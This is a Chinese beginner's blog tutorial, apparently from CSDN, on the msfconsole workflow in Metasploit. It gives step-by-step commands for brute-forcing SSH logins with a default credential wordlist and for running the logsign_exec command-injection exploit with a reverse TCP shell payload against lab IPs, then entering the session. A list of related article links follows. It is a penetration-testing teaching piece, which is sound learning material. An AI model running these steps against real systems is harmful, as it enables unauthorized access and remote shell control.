Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它具有图形化界面和命令行界面,这里讲的是msfconsole惯用的操作流程。本章使用的metasploit v5.0.2-dev版本,所以进入到msfconsole时,前缀是"msf5>",kali系统可以通过界面化启动metasploit,通过命令行启动服务,执行命令,metasploit依赖postgresql数据库:

service postgresql start #启动postgresql服务

service metasploit start #启动metasploit服务

第一步,search 模块名

在进行攻击之前,搜集了足够多的信息,如果没有搜集足够的信息,想通过metasploit的辅助模块来搜集相关系统的信息。可以在msfconsole的命令行输入你想搜集的信息。或者查看所有辅助模块。可以执行命令,这里使用了-S 参数:

msf5>search -S auxiliary auxiliary

第二步,use 模块名

查找到相关模块后,选择所需模块。这里以auxiliary/scanner/ssh/ssh_login为例,该模块功能是"ssh登录检查扫描",执行命令是:

msf5>use auxiliary/scanner/ssh/ssh_login

第三步,info

查找使用模块的信息的信息,这里使用第二步加载的模块:

msf5 auxiliary(scanner/ssh/ssh_login)>info

会显示模块的一下描述信息及基本参数信息。

第四步,show payloads

显示该模块可以使用的攻击载荷,如果是scanner时不需要使用(如果执行该命令,显示的所有可用的攻击载荷),,如果是exploit可以使用该命令查看可以使用的攻击载荷。例如选择攻击模块为“exploit/linux/http/logsign_exec”,该模块是“loginsign远程命令注入”,执行命令如下:

msf5 exploit(linux/http/logsign_exec)>show payloads

会显示该攻击模块可以使用的攻击载荷。

第五步,set payload 攻击载荷

按照第四步选择的那个攻击模块“exploit/linux/http/logsign_exec”,从攻击载荷中选择一个攻击载荷,例如选择“generic/shell_reverse_tcp”这个攻击载荷,该载荷的功能是“通用的shell命令,反射TCP连接”,操作命令是:

msf5 exploit(linux/http/logsign_exec)>set payload generic/shell_reverse_tcp

设置成功,会在命令行提示“payload=>generic/shell_reverse_tcp”。

第六步,show targets

查看攻击目标信息。

show targets

第七步,show options/advance

show options查看攻击和负载模块的基本配置参数。show advanced查看攻击和负载模块的高级配置参数。执行命令如下:

msf5 exploit(linux/http/logsign_exec) show options

msf5 exploit(linux/http/logsign_exec) show advanced

第八步,set name

设置攻击与载荷模块的配置参数。这里只设置要攻击的目标地址IP“RHOSTS”,载荷的本地地址IP“LHOST”,其他使用默认值。

msf5 exploit(linux/http/logsign_exec)>set RHOST 192.168.88.138

msf5 exploit(linux/http/logsign_exec)>set LHOST 192.168.88.132

设置成功后在命令行显示:“RHOSTS => 192.168.88.138、LHOSTS => 192.168.88.132”

如果是辅助扫描模块。这里设置使用的目标地址IP“RHOSTS USERPASS_FILE ” :

msf5 auxiliary(scanner/ssh/ssh_login)>set RHOSTS 192.168.88.137

msf5 auxiliary(scanner/ssh/ssh_login)>set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt

第九步,exploit/run

参数设置完毕。执行攻击命令进行攻击。如果是scanner模块,可以跳过“第三、四、五、六”步,执行第七步参数配置后,执行run命令进行扫描。如果是‘auxiliary/scanner/ssh/ssh_login’执行命令:

msf5 auxiliary(scanner/ssh/ssh_login)>run

如果是“exploit/linux/http/logsign_exec”执行命令:

msf5 exploit(linux/http/logsign_exec)> exploit

第十步,session -l

列出所有可用的交互会话以及详细信息。

msf5 exploit(linux/http/logsign_exec)>session -l

第十一步,session -i Id

通过指定Id,进入指定会话。例如进入会话的Id为2,执行命令是:

msf5 exploit(linux/http/logsign_exec) >session -i 2

进入当前活动会话,可以进行一些shell命令的操作。

总结

通过上述一些操作流程,能进行简单的攻击学习。该流程适合入门,可以培养安全测试的兴趣。孰能生巧,该流程比较多,可能熟练之后,这么多步,可能只需要五步,如果有问题可以加入群讨论

---------------------

作者:坏蛋是我

来源:CSDN

原文:https://blog.csdn.net/henni_719/article/details/89276935

版权声明:本文为博主原创文章,转载请附上博文链接!

Metasploit进行渗透测试的常用流程【入门】相关推荐

  1. 【3】web安全入门篇-渗透测试中常用的命令

    1.linux命令 渗透测试中常用的linux命令 上面博客提到的基本都能满足需求 2.cmd命令 常用的cmd命令 cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客,多敲一敲用的 ...

  2. Kali Linux渗透测试实战 1.3 渗透测试的一般化流程

    1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...

  3. Kali Linux渗透测试实战 1.3 渗透测试的一般化流程_商洛学院司徒荆_新浪博客

    1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...

  4. 网络安全渗透测试的常用工具

    文章目录 1.3.1 Nmap 1.3.2 Maltego 1.3.3 Recon-NG 1.3.4 OpenVAS 1.3.5 Metasploit 1.3.6 SET 1.3.7 Ettercap ...

  5. 渗透测试中常用端口及利用

    渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...

  6. 渗透测试实战-BurpSuite 使用入门

    前言 近期笔者在学习 web 渗透测试的相关内容,主要是为了公司之后的安全产品服务.渗透测试本身在学习过程中还是很有意思的,有一种学习到了之前想学但是没学的黑客技术的感觉,并且对笔者已掌握的许多知识做 ...

  7. Metasploit(MSF)渗透测试框架使用教程及基本命令

    第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一.使您能够 ...

  8. metasploit mysql_Metasploit渗透测试:选择模块

    原标题:Metasploit渗透测试:选择模块 当用户准备 攻击 时,首先需要选择针对目标 漏洞的模块.在MSF终端,提供了多个命令,可以帮助用户完成模块选择工作,如搜索模块.加载模块和编辑模块等. ...

  9. 渗透测试|网络安全常用靶场

    搭建教程网络上随便一搜一大堆,这里就不再赘述 vulhub 免费开源漏洞靶场 www.vulhub.org vulnhub 国外的一个靶场,难度中上(类似于真实渗透环境) https://www.vu ...

最新文章

  1. OKR不会颠覆KPI,而是融合应用!
  2. EBGAN, LSGAN, BEGAN
  3. java 连接池实例_功能完善的Java连接池调用实例
  4. 第四届程序设计竞赛(天梯赛)华南赛区回顾
  5. 苹果又想出涨价新招,iPhone 12将标配AirPods耳机?
  6. 硬件故障-笔记本电脑开不了机故障处理
  7. Codeforces 57C Array dp暴力找到规律
  8. TeamWork#3,Week5,The First Meeting of Our Team
  9. Unity3D视图介绍
  10. html 获取浏览器宽高,js获取浏览器高度与宽度的方法
  11. DPDK——IP分片和重组库
  12. netty 学习笔记(一)
  13. 全国省市县三级数据库
  14. 【百战GAN】适合所有人的第一个GAN项目:DCGAN图像生成代码实战
  15. 解决pip下载速度过慢及超时等其它的报错的方法适于多种操作系统(详细)
  16. C/C++语言100题练习计划 83——背包问题(贪心算法实现)
  17. 摄像头8mm可以看多远_监控摄像头有多少种,如何来选型
  18. 适配 iphone 微信h5页面
  19. Invalid bound statement (not found): com.example.demo.mapper.getUser.
  20. Thor 0.0.2 发布!

热门文章

  1. echarts 使用zoom属性的影响
  2. 《Python深度学习》第一部分读书笔记
  3. java Date类型:24小时制和12小时制
  4. visual studio 代码格式化的若干方法(含快捷键)
  5. Spring事务管理-》Spring事务管理(annotation)
  6. 第一节 java数据类型
  7. 自动秘钥密码(Autokey)
  8. python批量删除文件前缀名_Python3-去除目录中相同的文件名前缀
  9. win2d CanvasCommandList 使用方法
  10. PPC气箱脉冲除尘器